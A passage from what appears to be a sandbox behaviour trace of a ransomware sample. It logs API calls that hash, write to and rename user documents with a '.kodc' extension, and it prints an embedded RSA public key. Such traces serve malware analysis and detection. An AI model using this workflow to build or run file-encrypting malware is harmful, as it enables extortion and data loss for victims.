pdwDataLen=0x9e2fa54) returned 1 [0098.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.647] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.647] GetLastError () returned 0x0 [0098.647] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.647] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.647] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.647] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.647] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.647] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.647] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4650) returned 0x9ba4d90 [0098.647] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.647] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d450 [0098.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aad8 [0098.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d498 [0098.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aaf0 [0098.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab20 [0098.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab38 [0098.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.648] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab20 | out: hHeap=0x630000) returned 1 [0098.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab38 | out: hHeap=0x630000) returned 1 [0098.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0098.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ab38 [0098.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ab20 [0098.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0098.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0098.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0098.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab38 | out: hHeap=0x630000) returned 1 [0098.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab20 | out: hHeap=0x630000) returned 1 [0098.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.648] GetCurrentThreadId () returned 0x42c [0098.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8f3e8 [0098.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.649] GetCurrentThreadId () returned 0x42c [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab20 [0098.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0098.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab38 [0098.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab08 [0098.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ab50 [0098.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a568 [0098.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0098.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab20 | out: hHeap=0x630000) returned 1 [0098.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab20 [0098.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0098.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0098.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0098.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab20 | out: hHeap=0x630000) returned 1 [0098.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab50 | out: hHeap=0x630000) returned 1 [0098.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab38 | out: hHeap=0x630000) returned 1 [0098.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab08 | out: hHeap=0x630000) returned 1 [0098.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aaf0 | out: hHeap=0x630000) returned 1 [0098.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9d498 | out: hHeap=0x630000) returned 1 [0098.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.652] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x464d, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x464d, lpOverlapped=0x0) returned 1 [0098.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.652] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x4652, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.652] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0098.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0098.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.653] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.653] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.653] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.653] CloseHandle (hObject=0x5cc) returned 1 [0098.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0098.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.679] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rL1VA_HOPLxyaV y9I.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rl1va_hoplxyav y9i.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rL1VA_HOPLxyaV y9I.csv.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rl1va_hoplxyav y9i.csv.kodc")) returned 1 [0098.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.680] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.681] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18fc2bf0, ftCreationTime.dwHighDateTime=0x1d5bd3a, ftLastAccessTime.dwLowDateTime=0xf488f4e0, ftLastAccessTime.dwHighDateTime=0x1d5b5fc, ftLastWriteTime.dwLowDateTime=0xf488f4e0, ftLastWriteTime.dwHighDateTime=0x1d5b5fc, nFileSizeHigh=0x0, nFileSizeLow=0xa694, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="suY5F BlZ0nU Aw4D.odp", cAlternateFileName="SUY5FB~1.ODP")) returned 1 [0098.681] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.681] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.681] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\suY5F BlZ0nU Aw4D.odp") returned=".odp" [0098.682] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\suY5F BlZ0nU Aw4D.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\suy5f blz0nu aw4d.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.682] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=42644) returned 1 [0098.682] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.685] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa66e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.685] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.686] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.686] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xa694, lpOverlapped=0x0) returned 1 [0098.686] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.686] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.686] lstrlenA (lpString="-----BEGIN PUBLIC 